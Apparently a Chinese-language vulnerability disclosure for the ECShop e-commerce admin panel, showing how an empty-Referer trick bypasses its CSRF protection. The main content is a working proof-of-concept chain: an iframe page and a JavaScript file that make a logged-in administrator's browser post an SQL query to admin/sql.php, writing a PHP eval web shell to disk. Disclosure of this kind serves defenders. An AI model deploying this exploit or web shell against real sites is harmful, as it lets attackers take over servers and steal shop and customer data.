ecshop csrf防御绕过后台敏感功能csrf getshell

### 简要描述： csrf防御绕过。 ### 详细说明： 可以csrf执行后台各种敏感功能。这里分析的是利用空referer的方式绕过。参考http://zone.wooyun.org/content/744 利用这个绕过可以实现ecshop各个版本的csrf getshell，csrf dump数据库。测试了2.7.3一个版本和最新的2.7.4 本文可以看做该帖子的http://zone.wooyun.org/content/744的一个实例测试。感谢大神们分享技术. exp1,csrf getshell 利用执行sql的接口，结合报路径漏洞。 新建html文件内容为： <iframe src="javascript:'<script src=http://127.0.0.1/ecshop2.7.4/csrf.js></script>'"></iframe> 新建 http://127.0.0.1/ecshop2.7.4/csrf.js js文件。内容为： ``` var url="http://127.0.0.1/ecshop2.7.4/admin/sql.php"; var sendata = "sql=select+%22%3C%3Fphp+%40eval%28%24_POST%5B%27c%27%5D%29%3B%3F%3E%22+into+outfile+%27C%物理路径Ctestcsrf.php%27%3B&act=query"; if (window.XMLHttpRequest){ var xmlhttp1=new XMLHttpRequest(); } else{ var xmlhttp1=new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp1.open("POST",url,true); xmlhttp1.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); xmlhttp1.send(sendata); ``` 管理员访问链接即可生成testcsrf.php的文件。 [<img src="https://images.seebug.org/upload/201409/12191350c2bd6f6dd4b51c52bcf9093e3763bd70.jpg" alt="ecshop9.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/12191350c2bd6f6dd4b51c52bcf9093e3763bd70.jpg) [<img src="https://images.seebug.org/upload/201409/121914345917ffad7616f0d1c2a52c9207518bdd.jpg" alt="ecshop0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/121914345917ffad7616f0d1c2a52c9207518bdd.jpg) 这里仅仅使用这个接口做一个案例，后台大量的接口，敏感操作都暴漏在csrf的威胁之下了。 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201409/12191350c2bd6f6dd4b51c52bcf9093e3763bd70.jpg" alt="ecshop9.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/12191350c2bd6f6dd4b51c52bcf9093e3763bd70.jpg) [<img src="https://images.seebug.org/upload/201409/121914345917ffad7616f0d1c2a52c9207518bdd.jpg" alt="ecshop0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/121914345917ffad7616f0d1c2a52c9207518bdd.jpg)